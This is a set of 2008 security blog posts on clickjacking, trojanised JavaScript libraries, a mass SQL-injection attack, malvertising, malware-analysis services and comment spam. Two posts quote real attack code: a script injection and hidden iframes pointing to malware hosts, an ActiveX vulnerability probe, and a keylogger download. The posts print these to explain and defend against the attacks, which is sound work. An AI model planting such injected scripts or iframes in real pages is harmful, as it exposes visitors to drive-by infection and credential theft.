Mobile Safari was not actually vulnerable to the 'traditional' version of clickjacking, but it is susceptible to this new variant, which was discovered by John Resig and reported to Apple (CVE-2008-4232). There is no proper definition for clickjacking, but I'll define it as "obfuscating web page content, in order to social engineer a victim into performing an action other than what was intended". Now I'll split clickjacking into the following categories:
  1. Layered Clickjacking - When Jeremiah Grossman and Robert Hansen first discussed clickjacking, they detailed how the use of z-index values in Cascading Style Sheets CSS) could be used to layer content on top of other content. Then, leveraging CSS opacity values, the transparency of the layered content could be adjusted to show content on the bottom, while hiding the content on top, which is actually interacted with. A demonstration of this technique is available here.
  2. Overflow Clickjacking - The iPhone vulnerability does not require z-index or opacity values. Instead, the problem stems from the fact that the content of an embedded IFRAME can be forced to overflow it's bounds and spill onto the parent page. This is accomplished by adjusting the size of the IFRAME leveraging CSS transforms, which are supported by the webkit engine.
Rather than talking about it, let's see overflow clickjacking in action.












Fig 1 - Not Vulnerable

Fig 2 - Vulnerable






iPhone Clickjacking Demo


In Fig 1 (not vulnerable), you can see both the IFRAME content and the page content. Both have identical forms for password submission, but the IFRAME form is submitted to the attacker controlled page. In Fig 2 (vulnerable), you can see that the evil IFRAME has overwritten the page contents and we only see one (evil) password submission form.

While this is interesting, in reality, it comes with some very real limitations that will restrict the usefulness of the attack. In order to be valuable, we need a situation where an attacker controls the content of an IFRAME on a targeted page. This could occur with mashups or banner ads. An attacker could deliver IFRAME content to a subscribing web page and overwrite a portion of the parent page. They would however need to know which page was pulling the content in order to properly align the new content in order to make for a convincing attack.

I expect that we'll see a whole host of clickjacking-esque attacks in the coming months, affecting various browsers/applications. The ability to format page content via CSS, DHTML, etc. and improper implementations of these standards leaves plenty of room for error.

Happy Thanksgiving!

- michael

Technical Quickie: building SpiderMonkey on FreeBSD 6.2 AMD64

I wanted to get Didier Stevens modified SpiderMonkey Javascript engine compiled and running on a FreeBSD 6.2 AMD64 box. It turns out the config files shipped with his 1.7.0 version do not include FreeBSD support, so I wound up having to hack something together...and I thought I would share what I did in case others are interested. I assume these instructions would be relatively applicable to later FreeBSD versions as well.

When you go to build the source, config.mk pulls in an appropriate file in config/ to use for your system. On FreeBSD 6.2 AMD64, the output of 'uname –s' and 'uname –r' essentially lead to the config file named 'config/FreeBSD6.2-RELEASE.mk'. So what I wound up doing was go into the config/ directory and copy the 'Linux-All.mk' file to 'FreeBSD6.2-RELEASE.mk'.

If we were building on an x86 (32-bit) FreeBSD platform, that might be all we need to do. However, since we're building on AMD64 (64-bit), this configuration file needs to be modified because the default Linux configuration file references 64-bit CPU architecture as 'x86_64'; on FreeBSD AMD64, the CPU architecture is reported as 'amd64'. Fortunately the fix is simple: just do a find/replace on all values of 'x86_64' and change them to 'amd64'. There are three changes total.

Now that you've made those changes, you should be all set. Just build the application ("gmake –f Makefile.ref") and then grab the 'js' binary out of the 'FreeBSD6.2-RELEASE_DBG.OBJ/' directory.

Enjoy.

- Jeff

Not all P2P is evil

Allow me to step up on this conveniently available box of soap for a minute. I can't tell you the number of discussions I’ve been in where my conversation partner erroneously assumed that "P2P" was strictly synonymous with file sharing, copyright infringement, bandwidth hogging, and corporate time wasting. My viewpoint is that the term "P2P" references a specific network/communication design (i.e. arbitrary peers talk to other peers, rather than clients talk to dedicated servers), and not a particular usage. In other words, P2P is a communication technology platform that is agnostic to the application built on top of it. There are video delivery applications, file sharing applications, VoIP applications, IM applications, and privacy shielding applications that are built using P2P as their communication framework. You cannot define P2P as being any single one of those (particularly file sharing); and there are many legitimate uses for many of those listed applications. In fact, many businesses use functional non-P2P alternatives of those same types of applications on a daily basis.

Now, I completely understand and agree that P2P has received this bad reputation because the earliest adopters of the P2P communication model were applications that many organizations consider questionable. That's why I'm always happy to find uses of P2P that provide a positive benefit. A recent example I ran across was the
Network Early Warning System (NEWS), which uses P2P communication to cross-talk and alert about network connectivity and traffic issues. The Northwestern University Aqualab (creators of NEWS) liken NEWS to a "neighborhood watch for the Internet," with particular benefits to ISPs. Aqualab also has many other ongoing projects that relate to improving the performance and scalability of P2P communication models.

There is also
Pando, a company that offers what they call a "peer assisted" content delivery service that is targeted to businesses needing to deliver large amounts of media to their users. Basically they have married the traditional CDN concept with a P2P communication and distribution model, resulting in something they say scales significantly better (thus making less costly) than the traditional CDN approach. As an aside, our research shows that Pando is actually a tweaked version of BitTorrent that runs over standard SSL, which allows it to be served over port 443 with ease.

So the next time someone says "P2P is evil," remind them that P2P is just a platform utilized by many different applications, and they should clarify which P2P application(s) they have in mind.

- Jeff

Thursday, November 20, 2008

Trusted Computing is Chasing Yesterday's Problems

Earlier this week I was able to stop by the CSI 2008 conference. I was only able to take in a couple of the presentations, including a keynote by Steve Hanna, a Distinguished Engineer at Juniper Networks. Steve was speaking about trusted computing, explaining what it is and how it will tackle some of the security problems that we face. Now I'll confess that I've never been completely sold on the concept of trusted computing. I've tended to view it as somewhat of an ivory tower initiative that might work fine in a structured, high-security environment such as a DoD network, but not overly practical for the 'real world'. That said, Steve made some strong points about the value of Trusted computing and argued that it's closer to becoming a mainstream reality than I'd realized.

Steve detailed three primary layers for his vision of Trusted computing:
  1. Trusted hardware - The Trusted Platform Module (TPM) has a unique, secret RSA key burned into it at the time of manufacture and can be used for hardware identification. The TPM specification was developed by the Trusted Computing Group and many chip manufacturers have included a TPM in laptop chip sets since 2006.
  2. Tusted Operating System - Projects such as the NSA High Assurance Platform Program seek to leverage the TPM to create the foundation of a secure operating system.
  3. Network Access Control - Protecting access to resources or network.
Now I can envision how such a system, if implemented could go a long way towards limiting the spread of malicious code by ensuring that untrusted binaries are simply not permitted to execute on a given system. The problem with such an approach is that it works in opposition to the open nature of the Internet, a principal that we've come to know and love. Would users be willing to be restricted in the applications that can be run on their machines? I don't think so. In general we're willing to accept security risks in favor of an open architecture that allows flexibility. For proof, look no further than the cell phone industry. Cell phones were once inflexible boxes that ran specific applications and if you didn't like it, you could buy another phone. Today however, Telecoms are tripping over one another to show just how open they are and how they welcome third party applications. Will this break down barriers for mobile malicious code? Sure, but consumers don't care. They want flexibility.

My second concern with the vision for trusted computing is that it will do little to prevent web based attacks which don't require binary code execution and threats of this nature will only continue to grow. Take Clickjacking for example. This is really a social engineering attack. You are convincing someone to perform an action which they did not intend to do, because you are able to manipulate the look and feel of the page that they're viewing. Cross Site Request Forgery is another great example. Once again, the attack leverages web functionality as it was designed. No binary execution is required.

After listening to Steve's keynote, I have a better understanding and appreciation for trusted computing. However, I'm more convinced than ever that it's focused on yesterday's attacks, while we as an industry need to be looking to tomorrow.

- michael

Monday, November 17, 2008

Hiding web 2.0 malware in plain sight

Hello everyone, Jeff Forristal here. I thought I'd take a moment to discuss a trend we're seeing in attacker tactics, and predict how it may evolve into what will become commonplace tomorrow.

Recently we ran across a modified version of Adobe's Javascript-based Flash detection script used as part of a drive-by attack on web browsers. Basically the malware writers took the Flash Player Version Detection v1.7 script (AC_RunActiveContent.js) and tweaked it with a malicious payload. The heart of the evilness was caused simply adding one line, towards the end of the script:

document.write("<i"+"fr"+"ame
src='http://__someplace__.com/
pdfdoc/index.php?id=com2'
width=1 height=1></ifr"+"am"+"e>");

This causes the script to write out an IFrame tag that pointed to a malware site which then tried to deliver exploits to the browser in an attempt to cause arbitrary code execution.

I'm willing to speculate that anyone doing a shallow/naive review of the script could prematurely conclude that the script is the proper Adobe Flash detection script and thus dismiss it as non-evil. Hopefully though many investigators would plow through the entire file and eventually see the plain-as-day extra IFrame code added, and thus see through the facade.

However, what if the IFrame code wasn’t easily visible? Javascript 'packers' (programs that transform the Javascript code into smaller, more concise code) are becoming the norm on the web for slimming down Javascript code and saving some transfer bandwidth. They work by rewriting the code and essentially obfuscate what is going on as a byproduct. This can make it much more difficult to understand what the Javascript code is doing simply by casually perusing it; a simple Javascript 'document.write' of a malicious IFrame tag may not be so glaringly obvious anymore. And unfortunately, unlike executable (.EXE) packers such as UPX, the Javascript packers are used by many web sites and projects for legitimate reasons...so the mere presence of a packed Javascript file isn't an immediate red flag of its malicious intent (i.e. alerting on packed Javascript files is going to result in a lot of false positives).

How does this help attackers? Well, even though alerting on every packed Javascript file is not recommended, packing should still at least raise the suspicion level. An attacker taking their 'evil.js' file and packing it might obfuscate what evil.js is doing, but the fact that it's a packed file of unknown function may still cause people to investigate. Instead, an attacker can extend the previously mentioned tactic of hiding a malicious payload inside a legitimate Javascript library...but this time, pick a library that is commonly distributed in packed form and widely used. For example, we see packed versions of the JQuery Javascript library quite often on many different sites. A clever attacker could take the (unpacked) jquery.js file, insert their malicious code, pack it using the same packer normally seen used with jquery.js, and then deploy it. Anyone encountering this malicious file, at first glance, may consider it to just be the usual packed jquery.js file and ignore it; any automated signatures meant to flag packed Javascript files would, on the surface, not really differentiate between the packed original version and the packed modified version. And any advanced investigation into the file by looking at the code's behavior (or 'unpacking' it via various means) will, at first, just seem to be the standard set of JQuery functionality. Only those who continue to persist past all the obvious signs that the file is a legitimate jquery.js Javascript file would perhaps encounter the maliciousness of this web 2.0 Trojan horse.

Fortunately there is a workable solution to this problem: whitelists of known-good Javascript file hashes. Since the obvious targets are widely-deployed Web 2.0 Javascript libraries (JQuery, Dojo, SWFObject, Prototype, etc.) it would be feasible to construct a whitelist of the true/safe versions of these popular library files. Of course, maintaining a whitelist is a time-consuming effort, especially with new versions of each library coming out so often. And site designers would need to be encouraged to not make any personalizations/modifications directly to these standard library files, lest they trigger the alarms. It would be interesting if such a whitelist was then utilized by browser extensions such as NoScript to know automatically which Javascript files are safe to execute...but vetting the function library is a minor part of the problem since the site still needs to use custom Javascript to access/utilize the library in the first place.

It’s a hard problem still looking for a perfect solution (like many other security problems). Until next time,

- Jeff

Thursday, November 13, 2008

Stepping Through a Mass Web Attack

A few days ago, Kaspersky reported on yet another mass web attack. Such attacks are quickly becoming a preferred attack vector as they permit mass infection with minimal effort. We've seen this before, and not just once. In fact, it seems to be popular among Chinese hackers and is often used to gather authentication credentials for online games. While it hasn't yet been verified, it appears that SQL injection vulnerabilities on vulnerable servers led to the initial infection. All infected servers seem to be running Microsoft ASP pages, a common target for those seeking sites vulnerable to SQL injection.

I'm fascinated by such attacks as they illustrate the interconnected nature of the web and shatter the myth that you are safe if you stick to browsing reputable sites. Sadly, reputable sites struggle with vulnerabilities on a regular basis. The unfortunate reality is that any site, no matter how big or small, could be infected. In this latest attack, Travelocity was compromised. While vulnerable servers were infected, the true targets of these attacks are the end users which visit the sites. I've been preaching for some time now that we need to shift our focus from servers to browsers. We spend the majority of our security resources locking down servers and put minimal effort into protecting users browsing the web. Attackers have shifted their focus and we must do the same.

Attack Walk-Through

According to Kaspersky, the attack leverages multiple browser vulnerabilities and a variety of sites to host the attack scripts and malicious code. In order to better understand how these attacks succeed, let's walk through one such attack scenario which was live at the time this blog was written:

Step 1 - Server Infection

The attack begins by injecting code onto as many vulnerable web servers as possible. This is commonly accomplished via SQL injection. In this specific example, the following code was injected:

<script src="http://dbios.org/h.js">

This code won't change the appearance of the page, so a victim has no way of knowing that the so-called reputable page, is actually launching an attack on his browser. A quick Google search illustrates the mass nature of the attack and reveals that many sites are still infected.

Step 2 - Redirects

The initial JavaScript file typically doesn't contain the ultimate attack, but rather calls a variety of other scripts from different locations. This may be done in part to obfuscate the attack but is more likely done simply to accommodate multiple vulnerabilities and download sites in order to make the attack more robust and reach as many potential victims as possible. In our case, the following two IFRAMEs are added to the page:

document.write("<iframe width='20' height='0' src='http://vvexe.com/haha/index.html'></iframe>");
document.write("<iframe width='0' height='0' src='http://www.kenya.com/faq.htm'></iframe>");


Kasperky discusses that this latest round targets a variety of vulnerabilities in web browsers and Maromedia Flash Player. In our example, the exploitation is going after a vulnerability in the Snapshot Viewer for Microsoft Access ActiveX control, published on August 12, 2008 and detailed in MS08-041. One of the IFRAMEs contains code which attempts to instantiate the Snapshot Viewer ActiveX control as shown below:

try{var n;
var ll=new ActiveXObject("snpvw.Snapshot Viewer Control.1");}
catch(n){};
finally{if(n!="[object Error]"){document.write("("<iframe width=50 height=0 src=ff.htm></iframe>");}}

As can be seen, if the ActiveX control is indeed accessible, the browser then opens yet another IFRAME from http://vvexe.com/haha/ff.htm and this is where the attack actually lies. The writers of this exploit are either not particularly skilled or just lazy as they've simply leveraged an already public exploit line for line and simply changed the target download to http://ip.kanlang.com/haha/down.exe.

Step 4 - Client Infection

The down.exe executable is a Trojan, which goes by various aliases, including Infostealer.Wowcraft. The Trojan serves as a keylogger and is designed to harvest and transmit authentication credentials for World of Warcraft.

Lessons Learned
  1. Surfing 'reputable sites' is not guaranteed to prevent infection.
  2. A server side compromise is often the first step in a client side attack.
  3. Defense in depth is critical. In this situation, the threat can be mitigated by patch management, network and host based AV and blocking malicious URLs.
Happy surfing!

- michael

Friday, November 7, 2008

Cloud Services for Analyzing Malware

Despite continuing promises from software vendors, malware isn't going anywhere. Analyzing malware to protect against it and repair the damage that it may have done, is a significant part of the job description for many security professionals. The sheer volume of malware can make dealing with it an overwhelming task. Fortunately, a number of free cloud-based services have emerged to aid in the task of analyzing malware.

I'll divide the analysis tools into two categories - Anti-Virus Multi-Scanners and Sandboxes. The former is nothing more than a collection of AV scanners designed to run together analyzing the same file and return the different results for each AV vendor. This can be a very valuable starting point. It is frustrating to spend hours or days conducting deep analysis on a new binary only to find out that AV vendors have already analyzed the same file previously. A quick run through a multi-scanner can help to let you know if you're dealing with 0day or yesterday's news. Sandboxes on the other hand are emulation environments which perform automated behavioral analysis on a binary file. They allow the binary to execute and emulate the services that it attempts to interact with. Meanwhile, they are recording the activity which is occurring such as file reads/writes, registry access and network traffic.

AV Multi-Scanners

Building your own multi-scanner isn't a terribly difficult or expensive challenge. You need to obtain AV SDKs or command line tools from various vendors, develop a wrapper/front-end to simultaneously submit the same malicious code samples to all at the same time and parse/combine the results into a meaningful report. While it may be valuable to put in the effort if you expect to feed a heavy and regular volume of binaries into the multi-scanner, say for a honeypot network, there are free online alternatives if you're looking for only occasional analysis. Below is a chart comparing the functionality of a couple of popular (and free) multi-scanners.








VirusTotalVirScan.org
No. of Engines3439
Zip supportNoYes
Web SubmissionsYesYes
Email SubmissionsYesNo
SSL SupportYesNo


Sandboxes

Sandboxes automate the process of behavioral analysis. They permit a binary to execute in a controlled environment and monitor the activity which occurs. Given that we're dealing with malicious code, the binaries will generally attempt to spread, often by scanning for vulnerable hosts. Rather than actually permit malware to spread externally, sandboxes can simulate network responses to allow the binary to continue executing without actually permitting third party infection. If a steady volume of analysis is required you'll want to consider commercial products such as those offered by Norman and Sunbelt Software, however, such solutions can be expensive. If you only require periodic analysis, both vendors offer free web based access to their platforms. Anubis, by contrast, is purely a free web based service and does not have a commercial product offering. The chart below compares the functionality of these three cloud based sandboxes:









AnubisNorman SandboxCWSandbox
URL AnalysisYesNoNo
Zip SupportYesNoNo
SSL SupportYesNoNo
Email ResultsYesYesYes
Dependent BinariesYesNoNo


As can be seen, for an entirely free service, Anubis has an impressive feature set. They even encourage the automated of binaries for analysis so the platform can even be integrated into a honeypot network.

It's great to see free resources emerging for malware analysis. As mentioned, these free services won't meet everyone's needs, but if you're tasked with securing a network and only occasionally need analysis capabilities, these sites can significantly streamline your efforts.

- michael

Trust two times removed

Hello everyone, Jeff Forristal here. I thought I'd take a moment to discuss a real-life security incident that I recently reviewed in post-mortem fashion. The plot is simple: while the person was surfing the web, their browser was exploited by a piece of malware targeting a popular browser plugin. However, it's the details that make this story a bit intriguing...and scary.

The person's surfing session was quite normal and not particularly careless. During the moments just before the incident, the person was using Google to find an answer to a technical question. One of the top search results was for a smaller site that hosted technical tidbits of information collected and donated from various information sources. The person clicked through to that site. Now, this site is not a site that would be considered to have a 'risky' reputation, nor does it harbor any direct malware. It's just a normal, basic site that looks to be someone's personal project (site was designed in FrontPage 6.0!) to better the world by collecting and publishing useful information. In fact, the only thing questionable about it is the number of syndicated ads on the page: 7, by our count, from multiple vendors (BidVertiser, Google, Clicksor, and FastClick). Of course, it makes sense that they would (over-)populate their page(s) with ads in an attempt to generate revenue from their content publishing efforts. But this turned out to be the problem.

See, once the person's browser landed on this ad-infested page, the browser started running around like mad to fetch all the syndicated ad content. Each ad syndication attempt usually results in multiple browser requests because the main requests to the ad syndicator often results in a chain of redirects eventually landing at the specific content of the "advertisee" utilizing the syndication service. As the term 'syndication' implies, the ad services are just the middle-man between the web site and the advertisee. And the website is just the middle-man between the ad service and the web surfer.

Anyways, what eventually happened is that one of the ad syndicators served up an advertisee's ad...and it just so happened that the ad was actually a piece of malware that could immediately compromise the vulnerable browser plugin. This is not necessarily new news;
attackers have been known for quite a while to leverage advertising syndication as a way to spread their malware. But it's a bit scary to witness in action, and the growing amount of advertising syndication utilized by web sites is going to make it a more predominant malware delivery vector. The problem is exacerbated by the fact that the ads are no longer simple graphics; advertising syndicators usually allow their clients (the advertisees) to specify arbitrary HTML. This gives the advertisee cart blanche to use rich media ads that rely on multiple technologies such as DHTML, Javascript, Flash, etc. But this also gives an attacker full access to syndicate any arbitrary piece of malware that could be hosted/served via a normal web page. (Side note: maybe Google is onto something by only using pure text-based ads; the text is very easy to validate and stands practically no chance of harboring a piece of malware...)

What does this all mean? Well, there are a few things. First, all of those vendors who suggest an exploit is partially mitigated by the requirement that a "user must visit a malicious web page in order to be attacked" need to change their tune, because advertising syndication is essentially bringing the malicious web pages (via rich media ad capabilities) to the user. Second, the onus is on the advertising syndication services to ensure their clients aren't trying to deliver malware ads through the service. That's a tall order, and the ad vendors
have not exactly been batting 1000. Third, in the age of mashups and syndication, we no longer have a situation where a user has to only decide whether they trust the destination web site or not; they must now trust all the components that are mashed and syndicated into that site, and in turn trust all the components those components use, etc. In the incident I just talked about, we have the person trusting the web site, the web site trusting the advertising services, and the advertising services trusting their clients. Thus we come to having trust two times removed. Worse, web browser do not equip people with the necessary tools to really help them manage this trust chain effectively; it's pretty much an all-or-nothing shot based upon the user's trust of the immediate target web site. In the meantime, maybe browser plugins like AdBlockPlus and NoScript could help, although that essentially robs legitimate sites of advertising revenue. However, if enough users start to use ad blocking software as a matter of security, perhaps the advertising services will become pickier about their clientele and better scrutinize what they are actually syndicating.

Only time will tell, I suppose.
- Jeff

ps. if you are interested in which advertising vendor was the 'enabler' for the mentioned incident, well, we can not say with 100% certainity. But
there does seem to be a popular opinion against one of the vendors.

Friday, October 31, 2008

First encounters with a web comment spammer

Jeff Forristal here. I run a couple of personal web sites that host the usual gamut of material found on personal web sites (pictures of my kids and family, my latest favorite LOLcat graphic, etc.). Recently I updated one of my sites and added a new comment/contact submission form so I wouldn’t have to expose my email address for spam harvesters to find. A mere few hours after enabling this new comment submission form on my web server, I started to get some comments; unfortunately they were all comment spam.

Of course, web comment spamming has become yet another fact of life on the Internet. Blogs and forums with unmoderated/open comment submission functionality are quickly getting clogged with random and off-topic spam. Basically the spammers are taking the content they would normally send you in email, and now posting it to web site forums and blogs too. This is why comment moderation and CAPTCHAs are becoming the norm for forum and blog comment posting.

Anyways, there is nothing all that exciting about receiving spam of any variety. However the nature of the comment spam I received caught my eye. Over the course of a few weeks, I received multiple comment spams that all had the same format, but different random values.

Two examples of the comment spam I received were:

Email: cdbiib@orhabg.com
Comment:
jJsAdx <a href="http://aereogakjvpd.com/">aereogakjvpd</a>, [url=http://ubfcdpkfggto.com/]ubfcdpkfggto[/url], [link=http://wiogiusmvjcz.com/]wiogiusmvjcz[/link], http://ejmugotxbmqc.com/


Email: thowea@snkkjo.com
Comment:
fHwI3w <a href="http://uwtsayqpclib.com/">uwtsayqpclib</a>, [url=http://wetpnicpwkfd.com/]wetpnicpwkfd[/url], [link=http://bvtyjneqigek.com/]bvtyjneqigek[/link], http://prcghesjscpl.com/

We can make an educated guess that this comment submission isn’t directly about blindly shoving links onto sites in order to bolster incoming link counts (inflating PageRank ratings and aiding in SEO efforts), because all the links are random and don’t reference real sites. There is no practical value in the data itself that was submitted, except as acting as a probe to see what comes out the other side of the submission process. The data contains four different link formats (an actual HTML <A> tag, two flavors of popular bulletin board markup tags, and just a raw URL), and perhaps a fifth if you count the email address too. That makes me believe the end goal was probably to find a way to inject a clickable link of some sort. Had the action been successful, perhaps the same software would have then subsequently tried to inject more meaningful links (back to our SEO theory). Or, perhaps this was just a pre-cursor scouting application compiling a list of URLs known to allow arbitrary link injection (such lists would commonly be paired or sold with spamware/crimeware apps used to inject content onto listed sites already known to be open to receiving the injection).

Of course, being the curious individual that I am, I started to wonder:

  • The app managed to put something resembling an email address into the email field. Now, sure, the form field name was ‘email’, so it wouldn’t be that hard to deduce; what would happen if I named that field something less obvious ('mail', 'eml', 'e', 'foo')?
  • The links were submitted in a textarea field; will it submit the same type of data in a more constrained input text box?
  • Will it try to inject content into other identifiably named fields, such as 'phone', 'address', 'url', etc.?
  • Does the app support cookies? Is it a well-behaved web user agent? How smart is it?
  • Can the app's injection logic handle multi-step submissions, where you submit to one page/place and the data eventually appears on a different page/place but not within the actual submission response (think: you submit a comment, you get a page that says "thank you", but then have to click one more link before you get to where your comment is actually displayed)?
  • And of course, the million dollar question: what would have happened had their injection succeeded and produced a clickable link?

I’m not one to leave such important questions burning on my mind (heh), so I came up with a plan to get the answers I want. I will lay a trap for the comment spammer (or rather, their app). The idea is simple: through the magic of some server-side logic, I will detect when this comment spamming app is making submissions to my forms (assuming they come back in the future; but historically they seem to visit me on a fairly regular basis, so it seems a safe assumption). Rather than display the usual "thank you for your submission" response, I’ll instead feed a specially crafted response to make it seem like the submission actually produced a clickable link (making me look vulnerable). Further, I will then flag that session/IP as a spammer, and all subsequent requests will result in some extra forms being added to the web page responses. Those forms will be designed with certain characteristics meant to gauge the effectiveness and operation of the application and its web crawler; I’m assuming the app will repeat its typical injection testing process for as many forms as it encounters.

So if all goes accordingly to plan, I intend to post a follow-up to this aptly titled article in a few weeks. The follow-up will of course be entitled "Second encounters with a web comment spammer."

Until then!
- Jeff